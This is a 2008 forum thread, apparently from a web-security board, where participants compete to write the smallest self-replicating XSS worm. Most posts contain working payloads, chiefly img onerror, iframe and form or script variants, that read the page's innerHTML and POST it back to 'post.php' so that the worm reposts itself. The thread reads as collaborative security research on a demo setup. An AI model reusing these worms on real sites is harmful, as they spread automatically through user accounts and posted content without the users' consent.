Diminutive XSS Worm Replication Contest

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:25PM

@Matt

No it doesn't in FF, check on a live server nothing happens.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:26PM

@SDC: Unfortunately it doesn't work - see above :-/ - damn that would have been cool.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 07, 2008 04:38PM

@Ronald - ran it through SDC's page. and it did work. FF2 Windows XP Pro. Please no jokes about windows :)

Edited 1 time(s). Last edit at 01/07/2008 04:38PM by Matt Presson.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 04:38PM

Ronald's still works. I'm sure that was just a typo. Thats at 134 now for Ronald.
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

EDIT: Oh, does his actually post to 'content' even without the quotes?

Edited 1 time(s). Last edit at 01/07/2008 04:40PM by DoctorDan.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:41PM

@DoctorDan: not exactly ;)

<edit>yes but that doesn't work - check some posts afterwards...</edit>

Edited 1 time(s). Last edit at 01/07/2008 04:45PM by .mario.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:47PM

Given the fact that this works:

<b><img src=. onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

makes it smaller, but I'm not sure if it's allowed (as discussed earlier) cuz can't seem to find a way to make this baby shrink. :)

Edited 1 time(s). Last edit at 01/07/2008 04:48PM by Ronald.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:54PM

Since Firefox generates src="." from src=. it actually grows one byte bigger. I think with most of the submissions we have come to pretty much the end of possibilities to optimize.

Time for bed - let's see what's in here tomorrow morning (damn the contest has to stop - I am f**ing addicted to this *g*). Btw - tomorrow 9am GMT+1 we can expect an elephant's horde to raid the board - the contest was written about on heise.de :-/

http://www.heise.de/security/news/meldung/101401
http://www.heise-security.co.uk/

Greetings & gn8!
.mario

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:56PM

just quit .mario! ;)

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 05:01PM

Ronald, along those lines you I believe could also do this:
<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b
for a cool 130 characters. The rules don't seem to swing that way though.

-Dan

Edited 1 time(s). Last edit at 01/07/2008 05:03PM by DoctorDan.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 07, 2008 05:02PM

doctor dan, that will grow

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 05:04PM

I know- I thought that was the concept in question with Ronald's post (with the worm he just posted that will grow). My point is that there are more characters to be shaved if we are to disregard the growth rule.

-Dan

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 05:34PM

_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">

(includes a new line)

142 chars including a new line

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Edited 2 time(s). Last edit at 01/07/2008 05:40PM by Gareth Heyes.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: tx

Date: January 07, 2008 06:25PM

@Ronald: if this works

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

why not just do this:

<b><img src onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

which drops three bytes, or am I missing something?

EDIT: nm, it will grow with ='' anyway.

-tx @ lowtech-labs.org

Edited 1 time(s). Last edit at 01/07/2008 06:26PM by tx.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 06:30PM

_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">

If this works in IE, it may be a good optimization of Gareth's. There's a new line in there- 138 chars.

-Dan

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 08:36PM

@Dan

Cool but my original forgot to include a new line so technically the worm decreases in length by one byte.

_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/)+'\n')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 08:37PM

Nobody can beat Ronald now lol :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 08:38PM

@tx

The worm will increase in size because the browsers actually modify the source when using innerHTML

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 09:32PM

{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9

I suppose this is my current submission of 139 bytes. So is Ronald at 134 or 131? I see it says 131, but that doesn't send the payload as 'content' on my instance of FF. Either way, that worm is so great. It's very cool that we've managed fit an entire XHR into an img tag- a whole worm into just under 140 bytes. This has been some great collaboration.

-Dan

Edited 1 time(s). Last edit at 01/07/2008 10:47PM by DoctorDan.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 07, 2008 10:01PM

just to follow track.. this are the top codes:
doctype compilant: 154

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

not compilant: 141

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

both from .mario :P hehe.. incredible

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 07, 2008 10:16PM

@sirdarckcat
what about Ronald's and the one's we're posting right now!?

EDIT:
And I shaved another byte off mine, down to 138 bytes:
{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B
The 0x0B hex at the end is really a vertical tab character.

-Dan

Edited 2 time(s). Last edit at 01/07/2008 10:44PM by DoctorDan.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 11:13PM

My entry (without XHR):-

<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">

160 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: backStorm

Date: January 07, 2008 11:47PM

@mario: you are right, i think i was just irritated of the green light missing the alert :P

so i think mario's iframe solution should be perfect with 129 without user action ;)

Edited 1 time(s). Last edit at 01/07/2008 11:47PM by backStorm.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 04:37AM

@tx

well, firefox seems to add src="" itself, I like to do that but, that a no go.

I stick with my 134 byte sollution, if anyone else wins by stripping a byte, so be it. Point is, it can be done in a range between roughly 120-140 bytes which is impressively awesome, due to everyone's contribution we've been able to make this baby as small as possible.

I have to work, there money to be made :)

Good luck fellas.

Edited 1 time(s). Last edit at 01/08/2008 04:44AM by Ronald.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 04:42AM

just to be sure here is the one I talk about, 134 bytes.

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

.mario's is 1 byte less (I think)

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 05:18AM

@Ronald: I am not sure - I think yours was 135 bytes long and I optimized the nesting to make it 134 bytes long - anyway, most vectors are community-generated/optimized so I think there's almost no way to say mine or yours :)

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: DoctorDan

Date: January 08, 2008 05:45AM

Exactly, .mario, and I think that's perfectly fine. Sure, it's a contest, but almost everybody contributed something to the mix that synthesized new worms. I personally find these short ones with XHR pretty amazing! I don't know how the current ones- in the 140 byte range- could really be optimized much further (then again, I did find myself saying the same thing 15 bytes ago).

-Dan

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 05:51AM

Oh sorry .mario! yeh it got pretty confusing already. :)

If there is a winner that combines all these ideas, we all participated in them. I think the best prize is that I learned something from it, and it sure was fun. Buuuut, that doesn't mean I'm not trying to beat .* of you of course ;)

But I think we must agree that =. instead of ='', and leaving closing tags out of the vectors, isn't the way to go. moreover it's more semantic if we write proper markup as well, cause you never know how other platforms might react on it, still that is my opinion.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 06:33AM

@Ronald: I agree and I am very excited how RSnake decides in the end (two more days to wait *g*).

@DoctorDan: Yep - although I am pretty out of ideas on how to find a way to self-execute events from HTML elements - I think we have been milking out almost all possibilities of HTML and JS the last days :)

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 08, 2008 06:37AM

like I told SDC yesterday, pity this:

<ISINDEX prompt="foo">

isn't easy to make scriptable and is GET, otherwise it gave us a full form.

--

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 08, 2008 07:03AM

This isn't the smallest but I thought it was cool :)

_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote